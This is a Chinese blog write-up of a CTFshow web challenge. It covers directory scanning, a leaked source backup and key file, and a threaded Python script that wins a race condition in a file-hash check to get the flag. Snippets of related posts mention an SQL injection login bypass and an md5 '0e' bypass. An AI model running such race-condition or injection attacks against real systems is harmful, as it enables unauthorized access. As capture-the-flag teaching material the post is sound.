CTFshow-web-红包题第六弹

最新推荐文章于 2024-05-30 22:18:20 发布
最新推荐文章于 2024-05-30 22:18:20 发布
阅读量553 收藏 1
点赞数 1
分类专栏: CTFshow 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_68581192/article/details/134208612
版权
文章讲述了在CTFshow的web挑战中,通过分析源代码和使用dirmap工具发现漏洞,利用key.dat绕过部分验证,通过并发编程快速替换sha1值以获取flag的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

CTFshow-web-红包题第六弹

打开靶场,显示如下:
在这里插入图片描述
查看源代码
在这里插入图片描述
用dirmap扫描
python dirmap.py -i http://b081f96f-e568-44e3-91b5-b00eb60e0e64.challenge.ctf.show/ -lcf
在这里插入图片描述
发现web.zip目录是直接下载的,另外两个会跳转页面,但是内容是显示什么什么然后error。下载web.zip,发现check.php.bak
在这里插入图片描述
在这里插入图片描述
发现是跟key.dat比较,我们尝试在url中添加/key.dat,发现可以下载,我们利用下列代码

首先获得key.dat,首先访问一下这个文件,emmm,果然直接下载了,那么第一层的绕过我们直接就使用了key.dat文件,第二层的sha1值我们随便上传一个字符串即可,所以我们需要并发编程,将$receiveFile中的内容在极短时间内进行替换,这里我们可以编写一个python脚本来进行解题。

import requests
import time
import hashlib
import threading

#这里为什么用分钟数生成:因为通过抓包发现改变分钟后token值才会变化
i=str(time.localtime().tm_min)
#生成token
m=hashlib.md5(i.encode()).hexdigest()
url="http://b081f96f-e568-44e3-91b5-b00eb60e0e64.challenge.ctf.show/check.php?token={}&php://input".format(m)

def POST(data):
    try:
        r=requests.post(url,data=data)
        if "ctfshow" in r.text:
            print(r.text)
            pass
        # print(r.text)
        pass
    except Exception as e:
        print("somthing went wrong!")
        pass
    pass

with open('key.dat','rb') as t:
    data1=t.read()
    pass
for i in range(50):
    threading.Thread(target=POST,args=(data1,)).start()
for i in range(50):
    data2='emmmmm'
    threading.Thread(target=POST,args=(data2,)).start()

将下载的key.dat和该脚本放在同一路径下运行即可
在这里插入图片描述
找出flag

ctfshow红包第六 wp
jwkaaaaaa的博客
07-11 344
ctfshow红包第六 wp
ctfshow-红包第五
m0_67507776的博客
04-19 939
1.下载压缩包,正常解压得到“《画》.mp3”,各种针对音频没有作用,上当,结束...... 2.本zip里面隐藏了一个图片,需要用foremost分离出来 3.使用steghide得到隐写flag.txt文本文件,密码是猜的123456 steghide info .\xx.jpg #检测文件 steghide extract -sf .\xx.jpg #分离文件 4.得到flag.txt aHR0cHM6Ly93d3cubGFuem91cy...
ctfshow-红包第六
XYH_233的博客
03-13 1103
CTFshow红包第六,正解
ctfshow-web红包第六
2202_75812594的博客
04-22 669
3、由于先对文件进行操作,在进行之后的判断,我们可以利用md5中间判断的极小间隙替换原来flag.dat的数据,让sha512成立,造成条件竞争。通过dirmap或者dirsearch进行目录扫描,发现了一个web.zip的文件,下载即能获取check.php的源代码。通过php://input。由于条件竞争的是利用时间间隙来进行绕过,运气不好可能需要运行多次才能看到flag。1、date获取当前时间的分钟数,然后和我们传入的Token进行一个对比。函数里有一条向服务器发送请求的代码。
CTFshow--web--红包第六
weixin_45908624的博客
01-29 1268
ctfshow--web--红包第六
ctfshow-web-红包第六
HAI_WD的博客
08-26 1586
原理就是将上传的文件保存为flag.dat,然后进行对比,那么这种情况肯定会出现条件竞争,也就是说flag.dat在比较完第一次之后被覆盖了的话,就可以满足第二个条件。进行md5,然后就是文件md5对比,要求md5一致,但是sha512不一样,这里比较的文件是key.dat。首先跑一下字典,这里用的dirmap,可以看到有一个web.zip。下载下来之后发现是一个网站备份,备份的是check.php.bak。然后接着看,可以看到这里不太可能是sql注入,有一个请求。直接访问进行下载即可。
ctf.show_红包第六
m0_74445847的博客
04-20 483
3.在极短的时间内,传上不同的key2.dat,通过SHA-512哈希值的比较。2.先上传一模一样的key.dat,通过md5值的比较。这里放了竞争的两种格式。
ctfshow-web-web红包
07-14
ctfshow-web-web红包是一道CTF比赛中的网络安全目。这道目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...
2024年网络安全最全ctfshow-WEB-web5_ctfshow web5
2401_84281698的博客
05-03 685
ctf.show WEB模块第5关需要传递两个参数,一个字符串,一个数字,并且两个参数的md5值必须相同,我们可以利用md5的0e漏洞进行绕过0e绕过是指:0e开头的字符串在参与弱类型比较时,会被当做科学计数法,结果转换为0;我们只要传入两个md5值是以0e开头的参数,即可绕过md5加密,夺取flag页面中展示了部分源码,从源码中我们可以得知,想要夺旗需要通过GET请求传递两个参数v1和v2,并且参数v1必须是纯字母字符串,参数v2必须是数字或者数字字符串,并且两个参数的md5值必须相等。
ctfshow-WEB-web2_ctf
2401_84297618的博客
04-28 641
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可在用户名的输入框中输入万能账号 a’ or true #,密码随便输登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输。
[ctf.show.reverse] 红包
weixin_52640415的博客
04-15 1316
下来是个压缩包,解开后一个原码,解码后是notflag,发现压缩包有5k大而解出的java文件只有1k,显然包里还有内容未解出 用010打开包发现有两个EzJar.class文件,手工切出解压 import zlib inflator = zlib.decompressobj(-zlib.MAX_WBITS) f=open('EzJar.jar','rb') f.seek(659) a=f.read(3248) f.close() x = inflator.decompress(a) f=open('
红包六(CTFshow
m0_72827793的博客
01-25 1170
我对应着看,结果发现都是0000,奇怪了,这怎么找?可以直接丢进去看,也可以用jd反汇编工具看。这里提示flag不在这里分析一下这段代码。3248怎么来的没搞懂,做个记录吧。就这样用jd反汇编打开这个java。但确实学习了一波压缩包的文件结构。压缩文件有5k解压却变成了1k。为什么是从第659个字节开始?jd逆向工具反编译jar文件。这得对压缩包的文件结构熟悉。jar的逆向,第一次接触。看了别人写的脚本文件。
ctfshow红包第六
weixin_43873408的博客
08-02 1941
在开始界面点击hint得到提示信息: 打开连接得到的是一个登录界面,前面提示了不是sql注入,直接放弃尝试,查看网页源码得到信息: <script> function login(s){ var u=document.getElementById("username").value; var p=document.getElementById("password").value; var xhr = new XMLHttpRequest();
吾爱2023新年红包第六 (CTF)
热门推荐
Codeooo 博客
02-07 8万+
而且这里面还判断了key的长度,16位,正常key长度也是16位;上面这个 aWfkuqokj454836 15位,心态崩了,看来是假的,这个里面才是真的啊~~~~~~这几道,完全就是整人玩,一个一直点999次,一个大喊大叫还说你是细狗,还得声音分贝大于100才解锁开始找flag;直接将这个 |wfkuqokj4548366 key 扔进去 get_RealKey方法,在比较的时候打断点,或者hook,拿到正确的可以;看伪C代码,memcmp比较, 是有个和真key比较的地方,返回bool;
之旅第39站,CTFshow 红包目8
cc菜的一批
02-19 1107
感谢ctf show平台提供目 下载压缩包,看到了两个文件。 使用010editor 打开mima.png ,在末尾处发现 kobe code。 这里附上@Admin师傅提供的kobe code对照图。 对应着解出来了压缩包密码。 OAEBEYTKNRBANB 解压出NBA.mp4之后,我们发现视频并不能播放,使用010查看前几个十六进制为: 再百度一下mp4的文件结构。 通过规律,...
CTF.show:萌新专属红包
qq_46230755的博客
01-17 918
账号密码为admin和admin888. 登陆后进行抓包,然后再发一次得到flag 把flag进行md5转换一下
之旅第31站,CTFshow 红包第五
cc菜的一批
02-17 1151
感谢ctf show平台提供目 下载到了目的压缩包,放入010editor中,查看一下。 工具报错了,说明压缩包里面有东西。 看见尾部是 FFD9 就知道,压缩包里面有一张jpg图片。 ctrl + F 进行搜索jpg的文件头。FFD8 创建一个hex文件,并把FFD8 ~ FFD9之间的内容,复制出来,另存为jpg。 得到一张logo图片。 使用steghide 工具,密码为123...
ctfshow web
2303_77961060的博客
05-30 880
ctf.show_红包第六
ctfshow_web3
最新发布
03-30
### CTFShow Web3 挑战概述 CTFShow 是一个面向网络安全学习者的在线平台,提供了多种类型的挑战供用户练习和提升技能。其中 Web3 领域的内容主要涉及区块链技术、智能合约漏洞分析以及去中心化应用的安全性测试等方面[^1]。 #### Web3 安全基础 Web3 的核心概念围绕着区块链技术和分布式账本展开。在 CTF 平台上的相关目通常会模拟真实世界中的智能合约漏洞场景,例如重入攻击 (Reentrancy Attack)[^2]、整数溢出/下溢 (Integer Overflow/Underflow)[^3] 和权限控制不当等问。这些问不仅考验参赛者对 Solidity 编程语言的理解程度,还要求他们具备一定的逆向工程能力和逻辑推理能力。 #### 常见工具与技巧 解决这类问时可以借助一些专门设计用于审计和调试 Ethereum 合约的开源软件包,比如 MythX 或 Slither 等静态分析器;同时配合 Remix IDE 进行动态交互操作以便更好地理解程序运行机制及其潜在缺陷所在之处[^4]。 以下是利用 Python 脚本来自动化完成某些特定任务的一个简单例子: ```python from web3 import Web3, HTTPProvider # 初始化连接节点实例 w3 = Web3(HTTPProvider('http://localhost:8545')) def get_contract_abi(contract_address): """ 获取指定地址下的 ABI 数据 """ pass # 实现方法省略... if __name__ == "__main__": contract_addr = '0xYourContractAddressHere' abi_data = get_contract_abi(contract_addr) # 创建合约对象 mycontract = w3.eth.contract(address=contract_addr, abi=abi_data) result = mycontract.functions.someFunction().call() print(f'Result from smart contract call:{result}') ``` 上述脚本展示了如何通过 `web3.py` 库与远程 RPC 接口通信,并调用部署于网络之上的某个已知功能接口。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值